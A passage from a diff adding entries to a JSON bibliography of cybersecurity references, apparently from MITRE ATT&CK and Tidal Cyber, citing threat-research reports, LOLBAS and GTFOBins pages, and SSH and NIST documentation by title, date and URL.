smokescreen still alive" + }, + "related": [], + "uuid": "b619e338-16aa-478c-b227-b22f78d572a3", + "value": "Malwarebytes SmokeLoader 2016" + }, + { + "description": "Baker, B., Unterbrink H. (2018, July 03). Smoking Guns - Smoke Loader learned new tricks. Retrieved July 5, 2018.", + "meta": { + "date_accessed": "2018-07-05T00:00:00Z", + "date_published": "2018-07-03T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html#more" + ], + "source": "MITRE", + "title": "Smoking Guns - Smoke Loader learned new tricks" + }, + "related": [], + "uuid": "072ac051-7564-4dd3-a279-7f75c91b55f1", + "value": "Talos Smoke Loader July 2018" + }, + { + "description": "FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2021-06-16T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html" + ], + "source": "MITRE", + "title": "Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise" + }, + "related": [], + "uuid": "a81ad3ef-fd96-432c-a7c8-ccc86d127a1b", + "value": "FireEye SMOKEDHAM June 2021" + }, + { + "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019.", + "meta": { + "date_accessed": "2019-01-16T00:00:00Z", + "date_published": "2017-08-08T00:00:00Z", + "refs": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/" + ], + "source": "MITRE", + "title": "Smuggling HTA files in Internet Explorer/Edge" + }, + "related": [], + "uuid": "b16bae1a-75aa-478b-b8c7-458ee5a3f7e5", + "value": "Environmental Keyed HTA" + }, + { + "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved May 20, 2021.", + "meta": { + "date_accessed": "2021-05-20T00:00:00Z", + "date_published": "2017-08-08T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/" + ], + "source": "MITRE", + "title": "Smuggling HTA files in Internet Explorer/Edge" + }, + "related": [], + "uuid": "f5615cdc-bc56-415b-8e38-6f3fd1c33c88", + "value": "nccgroup Smuggling HTA 2017" + }, + { + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.", + "meta": { + "date_accessed": "2019-04-15T00:00:00Z", + "date_published": "2018-11-29T00:00:00Z", + "refs": [ + "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50" + ], + "source": "MITRE", + "title": "SNAKEMACKEREL" + }, + "related": [], + "uuid": "c38d021c-d84c-4aa7-b7a5-be47e18df1d8", + "value": "Accenture SNAKEMACKEREL Nov 2018" + }, + { + "description": "Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021.", + "meta": { + "date_accessed": "2021-06-23T00:00:00Z", + "date_published": "2019-12-09T00:00:00Z", + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/" + ], + "source": "MITRE", + "title": "Snatch ransomware reboots PCs into Safe Mode to bypass protection" + }, + "related": [], + "uuid": "63019d16-07ec-4e53-98b7-529cc09b8429", + "value": "Sophos Snatch Ransomware 2019" + }, + { + "description": "Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.", + "meta": { + "date_accessed": "2017-11-30T00:00:00Z", + "date_published": "2015-09-19T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=1772" + ], + "source": "MITRE", + "title": "Sneaky Active Directory Persistence #14: SID History" + }, + "related": [], + "uuid": "26961107-c48e-46d5-8d80-cda543b3be3b", + "value": "AdSecurity SID History Sept 2015" + }, + { + "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.", + "meta": { + "date_accessed": "2019-03-05T00:00:00Z", + "date_published": "2016-03-14T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=2716" + ], + "source": "MITRE", + "title": "Sneaky Active Directory Persistence #17: Group Policy" + }, + "related": [], + "uuid": "e304715f-7da1-4342-ba5b-d0387d93aeb2", + "value": "ADSecurity GPO Persistence 2016" + }, + { + "description": "Jornet, A. (2021, December 23). Snip3, an investigation into malware. Retrieved September 19, 2023.", + "meta": { + "date_accessed": "2023-09-19T00:00:00Z", + "date_published": "2021-12-23T00:00:00Z", + "refs": [ + "https://telefonicatech.com/blog/snip3-investigacion-malware" + ], + "source": "MITRE", + "title": "Snip3, an investigation into malware" + }, + "related": [], + "uuid": "f026dd44-1491-505b-8a8a-e4f28c6cd6a7", + "value": "Telefonica Snip3 December 2021" + }, + { + "description": "Felipe Duarte, Ido Naor. (2022, March 9). Sockbot in GoLand. Retrieved September 22, 2023.", + "meta": { + "date_accessed": "2023-09-22T00:00:00Z", + "date_published": "2022-03-09T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf" + ], + "source": "Tidal Cyber", + "title": "Sockbot in GoLand" + }, + "related": [], + "uuid": "bca2b5c2-bc3b-4504-806e-5c5b6fee96e6", + "value": "Security Joes Sockbot March 09 2022" + }, + { + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.", + "meta": { + "date_accessed": "2020-08-04T00:00:00Z", + "date_published": "2019-07-03T00:00:00Z", + "refs": [ + "https://securelist.com/sodin-ransomware/91473/" + ], + "source": "MITRE", + "title": "Sodin ransomware exploits Windows vulnerability and processor architecture" + }, + "related": [], + "uuid": "ea46271d-3251-4bd7-afa8-f1bd7baf9570", + "value": "Kaspersky Sodin July 2019" + }, + { + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "meta": { + "date_accessed": "2015-12-10T00:00:00Z", + "date_published": "2015-12-04T00:00:00Z", + "refs": [ + "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + ], + "source": "MITRE", + "title": "Sofacy APT hits high profile targets with updated toolset" + }, + "related": [], + "uuid": "46226f98-c762-48e3-9bcd-19ff14184bb5", + "value": "Kaspersky Sofacy" + }, + { + "description": "Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.", + "meta": { + "date_accessed": "2018-03-15T00:00:00Z", + "date_published": "2018-02-28T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/" + ], + "source": "MITRE", + "title": "Sofacy Attacks Multiple Government Entities" + }, + "related": [], + "uuid": "0bcc2d76-987c-4a9b-9e00-1400eec4e606", + "value": "Unit 42 Sofacy Feb 2018" + }, + { + "description": "Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2018-11-20T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" + ], + "source": "MITRE", + "title": "Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan" + }, + "related": [], + "uuid": "1523c6de-8879-4652-ac51-1a5085324370", + "value": "Unit 42 Sofacy Nov 2018" + }, + { + "description": "Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.", + "meta": { + "date_accessed": "2018-11-26T00:00:00Z", + "date_published": "2018-11-20T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" + ], + "source": "MITRE", + "title": "Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan" + }, + "related": [], + "uuid": "8c634bbc-4878-4b27-aa18-5996ec968809", + "value": "Unit42 Cannon Nov 2018" + }, + { + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.", + "meta": { + "date_accessed": "2018-06-18T00:00:00Z", + "date_published": "2018-06-06T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + ], + "source": "MITRE", + "title": "Sofacy Group’s Parallel Attacks" + }, + "related": [], + "uuid": "a32357eb-3226-4bee-aeed-d2fbcfa52da0", + "value": "Palo Alto Sofacy 06-2018" + }, + { + "description": "F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2015-09-08T00:00:00Z", + "refs": [ + "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/" + ], + "source": "MITRE", + "title": "Sofacy Recycles Carberp and Metasploit Code" + }, + "related": [], + "uuid": "56a95d3c-5268-4e69-b669-7055fb38d570", + "value": "F-Secure Sofacy 2015" + }, + { + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "meta": { + "date_accessed": "2017-07-08T00:00:00Z", + "date_published": "2016-09-26T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + ], + "source": "MITRE", + "title": "Sofacy's 'Komplex' OS X Trojan" + }, + "related": [], + "uuid": "a21be45e-26c3-446d-b336-b58d08df5749", + "value": "Sofacy Komplex Trojan" + }, + { + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.", + "meta": { + "date_accessed": "2018-06-04T00:00:00Z", + "date_published": "2018-03-15T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + ], + "source": "MITRE", + "title": "Sofacy Uses DealersChoice to Target European Government Agency" + }, + "related": [], + "uuid": "ec157d0c-4091-43f5-85f1-a271c4aac1fc", + "value": "Sofacy DealersChoice" + }, + { + "description": "Unit 42. (2020, December 23). SolarStorm Supply Chain Attack Timeline. Retrieved March 24, 2023.", + "meta": { + "date_accessed": "2023-03-24T00:00:00Z", + "date_published": "2020-12-23T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/" + ], + "source": "MITRE", + "title": "SolarStorm Supply Chain Attack Timeline" + }, + "related": [], + "uuid": "ecbb602a-2427-5eba-8c2b-25d90c95f166", + "value": "Unit 42 SolarStorm December 2020" + }, + { + "description": "Symantec Threat Hunter Team. (2021, January 22). SolarWinds: How Sunburst Sends Data Back to the Attackers. Retrieved January 22, 2021.", + "meta": { + "date_accessed": "2021-01-22T00:00:00Z", + "date_published": "2021-01-22T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data" + ], + "source": "MITRE", + "title": "SolarWinds: How Sunburst Sends Data Back to the Attackers" + }, + "related": [], + "uuid": "50be20ca-48d1-4eb9-a25f-76935a0770b3", + "value": "Symantec Sunburst Sending Data January 2021" + }, + { + "description": "Carnegie Mellon University. (2020, December 26). SolarWinds Orion API authentication bypass allows remote command execution. Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2020-12-26T00:00:00Z", + "refs": [ + "https://www.kb.cert.org/vuls/id/843464" + ], + "source": "MITRE", + "title": "SolarWinds Orion API authentication bypass allows remote command execution" + }, + "related": [], + "uuid": "ad43df0c-bdac-43e2-bd86-640036367b6c", + "value": "Carnegie Mellon University Supernova Dec 2020" + }, + { + "description": "SolarWinds. (2020, December 24). SolarWinds Security Advisory. Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2020-12-24T00:00:00Z", + "refs": [ + "https://www.solarwinds.com/sa-overview/securityadvisory" + ], + "source": "MITRE", + "title": "SolarWinds Security Advisory" + }, + "related": [], + "uuid": "4e8b908a-bdc5-441b-bc51-98dfa87f6b7a", + "value": "SolarWinds Advisory Dec 2020" + }, + { + "description": "Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved March 7, 2022.", + "meta": { + "date_accessed": "2022-03-07T00:00:00Z", + "date_published": "2015-12-31T00:00:00Z", + "refs": [ + "https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/" + ], + "source": "MITRE", + "title": "Solution: Monitor DHCP Scopes and Detect Man-in-the-Middle Attacks with PRTG and PowerShell" + }, + "related": [], + "uuid": "6fce30c3-17d6-42a0-8470-319e2930e573", + "value": "solution_monitor_dhcp_scopes" + }, + { + "description": "SophosXOps. (2023, September 13). Sophos X-Ops Tweet September 13 2023. Retrieved September 22, 2023.", + "meta": { + "date_accessed": "2023-09-22T00:00:00Z", + "date_published": "2023-09-13T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://twitter.com/SophosXOps/status/1702051374287007923" + ], + "source": "Tidal Cyber", + "title": "Sophos X-Ops Tweet September 13 2023" + }, + "related": [], + "uuid": "98af96a6-98bb-4d81-bb0c-a550e765e6ac", + "value": "Sophos X-Ops Tweet September 13 2023" + }, + { + "description": "ss64. (n.d.). Source or Dot Operator. Retrieved May 21, 2019.", + "meta": { + "date_accessed": "2019-05-21T00:00:00Z", + "refs": [ + "https://ss64.com/bash/source.html" + ], + "source": "MITRE", + "title": "Source or Dot Operator" + }, + "related": [], + "uuid": "a39354fc-334f-4f65-ba8a-56550f91710f", + "value": "Source Manual" + }, + { + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.", + "meta": { + "date_accessed": "2017-11-16T00:00:00Z", + "date_published": "2017-11-07T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + ], + "source": "MITRE, Tidal Cyber", + "title": "Sowbug: Cyber espionage group targets South American and Southeast Asian governments" + }, + "related": [], + "uuid": "14f49074-fc46-45d3-bf7e-30c896c39c07", + "value": "Symantec Sowbug Nov 2017" + }, + { + "description": "Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019.", + "meta": { + "date_accessed": "2019-01-16T00:00:00Z", + "date_published": "2017-12-01T00:00:00Z", + "refs": [ + "https://pages.nist.gov/800-63-3/sp800-63b.html" + ], + "source": "MITRE", + "title": "SP 800-63-3, Digital Identity Guidelines" + }, + "related": [], + "uuid": "143599bf-167b-4041-82c5-8612c3e81095", + "value": "NIST 800-63-3" + }, + { + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020.", + "meta": { + "date_accessed": "2020-08-13T00:00:00Z", + "date_published": "2017-01-11T00:00:00Z", + "refs": [ + "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/" + ], + "source": "MITRE", + "title": "Spammers Revive Hancitor Downloader Campaigns" + }, + "related": [], + "uuid": "70ad77af-88aa-4f06-a9cb-df9608157841", + "value": "Threatpost Hancitor" + }, + { + "description": "Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "date_published": "2019-02-04T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/" + ], + "source": "MITRE", + "title": "SpeakUp: A New Undetected Backdoor Linux Trojan" + }, + "related": [], + "uuid": "8f0d6a8d-6bd4-4df5-aa28-70e1ec4b0b12", + "value": "CheckPoint SpeakUp Feb 2019" + }, + { + "description": "Cyfirma. (2020, December 16). Spear Phishing Attack by N. Korean Hacking Group, Kimsuky. Retrieved October 30, 2023.", + "meta": { + "date_accessed": "2023-10-30T00:00:00Z", + "date_published": "2020-12-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cyfirma.com/outofband/n-korean-hacking-group-kimsuky-escalates-attacks/" + ], + "source": "Tidal Cyber", + "title": "Spear Phishing Attack by N. Korean Hacking Group, Kimsuky" + }, + "related": [], + "uuid": "de9817bc-1ac0-4f19-b5af-c402c874f431", + "value": "Cyfirma Kimsuky Spear Phishing" + }, + { + "description": "Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022.", + "meta": { + "date_accessed": "2022-06-09T00:00:00Z", + "date_published": "2022-02-25T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/" + ], + "source": "MITRE", + "title": "Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot" + }, + "related": [], + "uuid": "b0632490-76be-4018-982d-4b73b3d13881", + "value": "Palo Alto Unit 42 OutSteel SaintBot February 2022" + }, + { + "description": "Sadique, M. and Singh, A. (2020, September 29). Spear Phishing Campaign Delivers Buer and Bazar Malware. Retrieved November 19, 2020.", + "meta": { + "date_accessed": "2020-11-19T00:00:00Z", + "date_published": "2020-09-29T00:00:00Z", + "refs": [ + "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware" + ], + "source": "MITRE", + "title": "Spear Phishing Campaign Delivers Buer and Bazar Malware" + }, + "related": [], + "uuid": "fc46f152-9ed7-4850-8127-7b1f486ef2fe", + "value": "Zscaler Bazar September 2020" + }, + { + "description": "Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.", + "meta": { + "date_accessed": "2018-07-03T00:00:00Z", + "date_published": "2018-03-02T00:00:00Z", + "refs": [ + "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/" + ], + "source": "MITRE", + "title": "Spear-phishing campaign leveraging on MSXSL" + }, + "related": [], + "uuid": "927737c9-63a3-49a6-85dc-620e055aaf0a", + "value": "Reaqta MSXSL Spearphishing MAR 2018" + }, + { + "description": "Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.", + "meta": { + "date_accessed": "2017-02-24T00:00:00Z", + "date_published": "2017-02-22T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html" + ], + "source": "MITRE", + "title": "Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government" + }, + "related": [], + "uuid": "d1509d15-04af-46bd-a6b1-30fbd179b257", + "value": "FireEye Regsvr32 Targeting Mongolian Gov" + }, + { + "description": "Moran, N. and Lanstein, A.. (2014, March 25). Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370. Retrieved April 15, 2016.", + "meta": { + "date_accessed": "2016-04-15T00:00:00Z", + "date_published": "2014-03-25T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html" + ], + "source": "MITRE", + "title": "Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370" + }, + "related": [], + "uuid": "6a37e6eb-b767-4b10-9c39-660a42b19ddd", + "value": "FireEye admin@338 March 2014" + }, + { + "description": "Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014.", + "meta": { + "date_accessed": "2014-11-13T00:00:00Z", + "refs": [ + "http://msdn.microsoft.com/en-us/library/bb166549.aspx" + ], + "source": "MITRE", + "title": "Specifying File Handlers for File Name Extensions" + }, + "related": [], + "uuid": "cc12cd2c-4f41-4d7b-902d-53c35eb41210", + "value": "Microsoft File Handlers" + }, + { + "description": "GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.", + "meta": { + "date_accessed": "2022-04-18T00:00:00Z", + "date_published": "2020-11-13T00:00:00Z", + "refs": [ + "https://gtfobins.github.io/gtfobins/split/" + ], + "source": "MITRE", + "title": "split" + }, + "related": [], + "uuid": "4b86c8c3-57b0-4558-be21-f928acb23f49", + "value": "GTFO split" + }, + { + "description": "Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) — Linux manual page. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "refs": [ + "https://man7.org/linux/man-pages/man1/split.1.html" + ], + "source": "MITRE", + "title": "split(1) — Linux manual page" + }, + "related": [], + "uuid": "3a4dc770-8bfa-44e9-bb0e-f0af0ae92994", + "value": "split man page" + }, + { + "description": "Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.", + "meta": { + "date_accessed": "2021-08-19T00:00:00Z", + "date_published": "2021-04-18T00:00:00Z", + "refs": [ + "https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/" + ], + "source": "MITRE", + "title": "Spoofing credential dialogs on macOS Linux and Windows" + }, + "related": [], + "uuid": "4f8abaae-1483-4bf6-a79c-6a801ae5a640", + "value": "Spoofing credential dialogs" + }, + { + "description": "Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "date_published": "2015-04-16T00:00:00Z", + "refs": [ + "https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/" + ], + "source": "MITRE", + "title": "Spoof Using Right to Left Override (RTLO) Technique" + }, + "related": [], + "uuid": "79d21506-07a8-444d-a2d7-c91de67c393e", + "value": "Infosecinstitute RTLO Technique" + }, + { + "description": "BBC. (2011, March 29). Spotify ads hit by malware attack. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2011-03-29T00:00:00Z", + "refs": [ + "https://www.bbc.com/news/technology-12891182" + ], + "source": "MITRE", + "title": "Spotify ads hit by malware attack" + }, + "related": [], + "uuid": "425775e4-2948-5a73-a2d8-9a3edca74b1b", + "value": "BBC-malvertising" + }, + { + "description": "National Security Agency/Central Security Service Information Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows Event Log Monitoring. Retrieved September 6, 2018.", + "meta": { + "date_accessed": "2018-09-06T00:00:00Z", + "date_published": "2015-08-07T00:00:00Z", + "refs": [ + "https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm" + ], + "source": "MITRE", + "title": "Spotting the Adversary with Windows Event Log Monitoring" + }, + "related": [], + "uuid": "c1fa6c1d-f11a-47d4-88fc-ec0a3dc44279", + "value": "NSA Spotting" + }, + { + "description": "Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.", + "meta": { + "date_accessed": "2015-09-29T00:00:00Z", + "date_published": "2014-07-31T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Spy of the Tiger" + }, + "related": [], + "uuid": "a156e24e-0da5-4ac7-b914-29f2f05e7d6f", + "value": "Villeneuve 2014" + }, + { + "description": "LOLBAS. (2018, May 25). Sqldumper.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/" + ], + "source": "Tidal Cyber", + "title": "Sqldumper.exe" + }, + "related": [], + "uuid": "793d6262-37af-46e1-a6b5-a5262f4a749d", + "value": "Sqldumper.exe - LOLBAS Project" + }, + { + "description": "Damele, B., Stampar, M. (n.d.). sqlmap. Retrieved March 19, 2018.", + "meta": { + "date_accessed": "2018-03-19T00:00:00Z", + "refs": [ + "http://sqlmap.org/" + ], + "source": "MITRE", + "title": "sqlmap" + }, + "related": [], + "uuid": "ac643245-d54f-470f-a393-26875c0877c8", + "value": "sqlmap Introduction" + }, + { + "description": "LOLBAS. (2018, May 25). Sqlps.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/" + ], + "source": "Tidal Cyber", + "title": "Sqlps.exe" + }, + "related": [], + "uuid": "31cc851a-c536-4cef-9391-d3c7d3eab64f", + "value": "Sqlps.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). SQLToolsPS.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqltoolsps/" + ], + "source": "Tidal Cyber", + "title": "SQLToolsPS.exe" + }, + "related": [], + "uuid": "612c9569-80af-48d2-a853-0f6e3f55aa50", + "value": "SQLToolsPS.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2019, June 26). Squirrel.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-06-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/" + ], + "source": "Tidal Cyber", + "title": "Squirrel.exe" + }, + "related": [], + "uuid": "952b5ca5-1251-4e27-bd30-5d55d7d2da5e", + "value": "Squirrel.exe - LOLBAS Project" + }, + { + "description": "Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022.", + "meta": { + "date_accessed": "2022-08-09T00:00:00Z", + "date_published": "2021-09-28T00:00:00Z", + "refs": [ + "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike" + ], + "source": "MITRE", + "title": "Squirrelwaffle: New Loader Delivering Cobalt Strike" + }, + "related": [], + "uuid": "624a62db-f00f-45f9-89f6-2c3505b4979f", + "value": "ZScaler Squirrelwaffle Sep 2021" + }, + { + "description": "Palazolo, G. (2021, October 7). SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot. Retrieved August 9, 2022.", + "meta": { + "date_accessed": "2022-08-09T00:00:00Z", + "date_published": "2021-10-07T00:00:00Z", + "refs": [ + "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot" + ], + "source": "MITRE", + "title": "SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot" + }, + "related": [], + "uuid": "5559895a-4647-438f-b3d5-6d6aa323a6f9", + "value": "Netskope Squirrelwaffle Oct 2021" + }, + { + "description": "Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2012-09-28T00:00:00Z", + "refs": [ + "https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking" + ], + "source": "MITRE", + "title": "SSH Agent Hijacking" + }, + "related": [], + "uuid": "4a4026e3-977a-4f25-aeee-794947f384b2", + "value": "Clockwork SSH Agent Hijacking" + }, + { + "description": "Hatch, B. (2004, November 22). SSH and ssh-agent. Retrieved January 8, 2018.", + "meta": { + "date_accessed": "2018-01-08T00:00:00Z", + "date_published": "2004-11-22T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/articles/ssh-and-ssh-agent" + ], + "source": "MITRE", + "title": "SSH and ssh-agent" + }, + "related": [], + "uuid": "0d576bca-511d-40a2-9916-26832eb28861", + "value": "Symantec SSH and ssh-agent" + }, + { + "description": "LOLBAS. (2021, November 8). ssh.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-11-08T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ssh/" + ], + "source": "Tidal Cyber", + "title": "ssh.exe" + }, + "related": [], + "uuid": "b1a9af1c-0cfc-4e8a-88ac-7d33cddc26a1", + "value": "ssh.exe - LOLBAS Project" + }, + { + "description": "SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.", + "meta": { + "date_accessed": "2020-03-23T00:00:00Z", + "refs": [ + "https://www.ssh.com/ssh" + ], + "source": "MITRE", + "title": "SSH (Secure Shell)" + }, + "related": [], + "uuid": "ac5fc103-1946-488b-8af5-eda0636cbdd0", + "value": "SSH Secure Shell" + }, + { + "description": "SSH.COM. (n.d.). SSH tunnel. Retrieved March 15, 2020.", + "meta": { + "date_accessed": "2020-03-15T00:00:00Z", + "refs": [ + "https://www.ssh.com/ssh/tunneling" + ], + "source": "MITRE", + "title": "SSH tunnel" + }, + "related": [], + "uuid": "13280f38-0f17-42d3-9f92-693f1da60ffa", + "value": "SSH Tunneling" + }, + { + "description": "SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "refs": [ + "https://www.sslshopper.com/ssl-checker.html" + ], + "source": "MITRE", + 